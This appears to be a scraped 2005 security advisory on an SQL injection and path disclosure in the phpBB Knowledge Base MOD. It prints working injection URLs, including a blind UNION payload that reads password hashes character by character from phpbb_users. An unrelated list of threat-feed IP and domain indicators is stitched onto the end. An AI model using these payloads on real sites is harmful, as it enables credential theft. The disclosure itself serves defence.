phpBB - Knowledge Base MOD - SQL-Injection and Full Path Disclosure
2005-04-19T00:00:00
ID SECURITYVULNS:DOC:8375 Type securityvulns Reporter Securityvulns Modified 2005-04-19T00:00:00
Description
phpBB - Knowledge Base MOD
SQL-Injection vulnerability and Full Path Disclosure
Discovered by [R] and deluxe89
Discussion:
The phpbb - Knowledge Base MOD has a relatively hard to exploit SQL-Injection vulnerability. However, an
attacker can exploit this bug and receive informations from the database.
The Bug:
The script doesn't filter the cat variable.
If we apply something wrong here:
/kb.php?mode=cat&cat='
We will get an error similar to this:
Could not obtain category data
DEBUG MODE
SQL Error : 1064 You have an error in your SQL syntax
SELECT * FROM phpbb_kb_categories WHERE category_id = \'
Line : 131
File : /here/is/the/full/path/functions_kb.php
/kb.php?mode=cat&cat=0+UNION+SELECT+0,0,0,0,0,0+FROM+phpbb_users+WHERE+1=0
No match: Categorie doesn't exist.
If it returns an SQL-Error, the first character of the hash is an 'a'.
Exploit available at the websites below.
Patch:
No patch available by now.
Greetz to madinfect, reddi, darkkilla, EaTh, Astovidatu and Doc
www.security-project.org
www.batznet.com
{"id": "SECURITYVULNS:DOC:8375", "bulletinFamily": "software", "title": "phpBB - Knowledge Base MOD - SQL-Injection and Full Path Disclosure", "description": "\r\n\r\n###########################################################\r\n# phpBB - Knowledge Base MOD #\r\n# SQL-Injection vulnerability and Full Path Disclosure #\r\n# #\r\n# Discovered by [R] and deluxe89 #\r\n###########################################################\r\n \r\n \r\nDiscussion:\r\nThe phpbb - Knowledge Base MOD has a relatively hard to exploit SQL-Injection vulnerability. However, an\r\nattacker can exploit this bug and receive informations from the database.\r\n \r\n \r\n \r\nThe Bug:\r\nThe script doesn't filter the cat variable.\r\nIf we apply something wrong here:\r\n \r\n/kb.php?mode=cat&cat='\r\n \r\nWe will get an error similar to this:\r\n \r\nCould not obtain category data\r\nDEBUG MODE\r\nSQL Error : 1064 You have an error in your SQL syntax\r\nSELECT * FROM phpbb_kb_categories WHERE category_id = \'\r\nLine : 131\r\nFile : /here/is/the/full/path/functions_kb.php\r\n \r\n \r\n \r\n/kb.php?mode=cat&cat=0+UNION+SELECT+0,0,0,0,0,0+FROM+phpbb_users+WHERE+1=0\r\nNo match: Categorie doesn't exist.\r\n \r\n/kb.php?mode=cat&cat=0+UNION+SELECT+0,0,0,0,0,0+FROM+phpbb_users\r\nMatch: DEBUG MODE - SQL-Error\r\n \r\nTherefor the only thing an attacker can find out is whether a row is matched or not.\r\n \r\n \r\n \r\nExploit:\r\nThe attacker may compare the informations in the database with test values. Example:\r\n \r\n0+UNION+SELECT+0,0,0,0,0,0+FROM+phpbb_users+WHERE+user_id=2+AND+ascii(substring(user_password,1,1))=97\r\n \r\nIf it returns an SQL-Error, the first character of the hash is an 'a'.\r\nExploit available at the websites below.\r\n \r\n \r\n \r\nPatch:\r\nNo patch available by now.\r\n \r\n \r\n\r\nGreetz to madinfect, reddi, darkkilla, EaTh, Astovidatu and Doc\r\n \r\nwww.security-project.org\r\nwww.batznet.com", "published": "2005-04-19T00:00:00", "modified": "2005-04-19T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:8375", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:12", "edition": 1, "viewCount": 7, "enchantments": {"score": {"value": 2.3, "vector": "NONE", "modified": "2018-08-31T11:10:12", "rev": 2}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:F3563336B135A1D7C1251AE54FDC6286"]}, {"type": "nessus", "idList": ["EULEROS_SA-2020-1318.NASL", "EULEROS_SA-2020-1323.NASL", "FREEBSD_PKG_090763F6703011EA93DD080027846A02.NASL", "EULEROS_SA-2020-1314.NASL", "DEBIAN_DLA-2164.NASL", "FREEBSD_PKG_40194E1C6D8911EA808280EE73419AF3.NASL", "EULEROS_SA-2020-1299.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562311220201314", "OPENVAS:1361412562311220201299", "OPENVAS:1361412562311220201323", "OPENVAS:1361412562311220201318", "OPENVAS:1361412562310892164"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2164-1:52F3C"]}, {"type": "zdt", "idList": ["1337DAY-ID-34159", "1337DAY-ID-34153", "1337DAY-ID-34157", "1337DAY-ID-34144", "1337DAY-ID-34134"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:10149"]}], "modified": "2018-08-31T11:10:12", "rev": 2}, "vulnersScore": 2.3}, "affectedSoftware": []}
{"rst": [{"lastseen": "2021-01-23T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **77[.]9.97.215** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **53**.\n First seen: 2021-01-23T03:00:00, Last seen: 2021-01-23T03:00:00.\n IOC tags: **tor_node**.\nASN 6805: (First IP 77.0.0.0, Last IP 77.15.255.255).\nASN Name \"TDDEASN1\" and Organisation \"\".\nASN hosts 15536 domains.\nGEO IP information: City \"Munich\", Country \"Germany\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-01-23T00:00:00", "id": "RST:C39C39DE-8375-3F7A-8107-019FCB35B7A0", "href": "", "published": "2021-01-23T00:00:00", "title": "RST Threat feed. IOC: 77.9.97.215", "type": "rst", "cvss": {}}, {"lastseen": "2021-01-22T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **180[.]216.222.168** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **20**.\n First seen: 2020-12-22T03:00:00, Last seen: 2021-01-22T03:00:00.\n IOC tags: **generic**.\nASN 4804: (First IP 180.216.0.0, Last IP 180.216.255.255).\nASN Name \"MPXAS\" and Organisation \"Microplex PTY LTD\".\nASN hosts 1619 domains.\nGEO IP information: City \"Frankston\", Country \"Australia\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-12-22T00:00:00", "id": "RST:4E1D4109-5479-3947-8375-BE25C5335ACD", "href": "", "published": "2021-01-23T00:00:00", "title": "RST Threat feed. IOC: 180.216.222.168", "type": "rst", "cvss": {}}, {"lastseen": "2021-01-22T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **174[.]53.195.88** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **2**.\n First seen: 2020-02-03T03:00:00, Last seen: 2021-01-22T03:00:00.\n IOC tags: **generic**.\nASN 7922: (First IP 174.48.0.0, Last IP 174.63.255.255).\nASN Name \"COMCAST7922\" and Organisation \"Comcast Cable Communications LLC\".\nASN hosts 160130 domains.\nGEO IP information: City \"Hastings\", Country \"United States\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-02-03T00:00:00", "id": "RST:4CC53504-6174-3B36-8375-9B8C8BD8ABF8", "href": "", "published": "2021-01-23T00:00:00", "title": "RST Threat feed. IOC: 174.53.195.88", "type": "rst", "cvss": {}}, {"lastseen": "2021-01-22T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **184[.]82.107.22** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **20**.\n First seen: 2020-12-22T03:00:00, Last seen: 2021-01-22T03:00:00.\n IOC tags: **generic**.\nASN 133481: (First IP 184.82.0.0, Last IP 184.82.127.255).\nASN Name \"AISFIBREASAP\" and Organisation \"AIS Fibre\".\nASN hosts 1077 domains.\nGEO IP information: City \"Bangkok\", Country \"Thailand\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-12-22T00:00:00", "id": "RST:C4376D14-3692-32FC-8375-8BA55C3B228E", "href": "", "published": "2021-01-23T00:00:00", "title": "RST Threat feed. IOC: 184.82.107.22", "type": "rst", "cvss": {}}, {"lastseen": "2021-01-22T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **110[.]157.215.236** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **10**.\n First seen: 2020-12-22T03:00:00, Last seen: 2021-01-22T03:00:00.\n IOC tags: **generic**.\nASN 4134: (First IP 110.157.128.0, Last IP 110.157.255.255).\nASN Name \"CHINANETBACKBONE\" and Organisation \"No31Jinrong Street\".\nASN hosts 1178566 domains.\nGEO IP information: City \"\", Country \"China\".\nIOC could be a **False Positive** (Cloud provider IP).\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-12-22T00:00:00", "id": "RST:3F0A1C0E-8375-36D7-BF79-2604BB498AA4", "href": "", "published": "2021-01-23T00:00:00", "title": "RST Threat feed. IOC: 110.157.215.236", "type": "rst", "cvss": {}}, {"lastseen": "2021-01-22T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **113[.]170.179.228** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **20**.\n First seen: 2020-12-22T03:00:00, Last seen: 2021-01-22T03:00:00.\n IOC tags: **generic**.\nASN 45899: (First IP 113.166.196.0, Last IP 113.171.18.255).\nASN Name \"VNPTASVN\" and Organisation \"VNPT Corp\".\nASN hosts 102863 domains.\nGEO IP information: City \"Ho Chi Minh City\", Country \"Vietnam\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-12-22T00:00:00", "id": "RST:676C744C-7279-325E-8375-A03CCEED0875", "href": "", "published": "2021-01-23T00:00:00", "title": "RST Threat feed. IOC: 113.170.179.228", "type": "rst", "cvss": {}}, {"lastseen": "2021-01-22T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **1f051671dbcc5582e70b71d2228b78ed[.]org** in [RST Threat Feed](https://rstcloud.net/profeed) with score **10**.\n First seen: 2020-12-22T03:00:00, Last seen: 2021-01-22T03:00:00.\n IOC tags: **generic**.\nIOC could be a **False Positive** (Domain not resolved. Whois records not found).\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-12-22T00:00:00", "id": "RST:E058AE07-1868-38C9-8375-C0E5FC759B92", "href": "", "published": "2021-01-23T00:00:00", "title": "RST Threat feed. IOC: 1f051671dbcc5582e70b71d2228b78ed.org", "type": "rst", "cvss": {}}, {"lastseen": "2021-01-22T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **ppl-stock[.]com** in [RST Threat Feed](https://rstcloud.net/profeed) with score **22**.\n First seen: 2020-12-22T03:00:00, Last seen: 2021-01-22T03:00:00.\n IOC tags: **generic**.\nDomain has DNS A records: 23[.]202.231.167,23.217.138.108\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-12-22T00:00:00", "id": "RST:188EE005-8375-3C43-806E-43B223D3CE8C", "href": "", "published": "2021-01-23T00:00:00", "title": "RST Threat feed. IOC: ppl-stock.com", "type": "rst", "cvss": {}}, {"lastseen": "2021-01-22T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **pinhalnawebon[.]com.br** in [RST Threat Feed](https://rstcloud.net/profeed) with score **10**.\n First seen: 2019-12-15T03:00:00, Last seen: 2021-01-22T03:00:00.\n IOC tags: **spam**.\nIOC could be a **False Positive** (Domain not resolved. Whois records not found).\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2019-12-15T00:00:00", "id": "RST:A73F68C5-B33B-339A-8375-FF0C3FF361CF", "href": "", "published": "2021-01-23T00:00:00", "title": "RST Threat feed. IOC: pinhalnawebon.com.br", "type": "rst", "cvss": {}}, {"lastseen": "2021-01-22T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **betaspantavtac30[.]club** in [RST Threat Feed](https://rstcloud.net/profeed) with score **10**.\n First seen: 2020-12-22T03:00:00, Last seen: 2021-01-22T03:00:00.\n IOC tags: **generic**.\nIOC could be a **False Positive** (Domain not resolved. Whois records not found).\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-12-22T00:00:00", "id": "RST:63AD9DE0-F6E4-3681-8375-EBD84BDAFBD7", "href": "", "published": "2021-01-23T00:00:00", "title": "RST Threat feed. IOC: betaspantavtac30.club", "type": "rst", "cvss": {}}]}
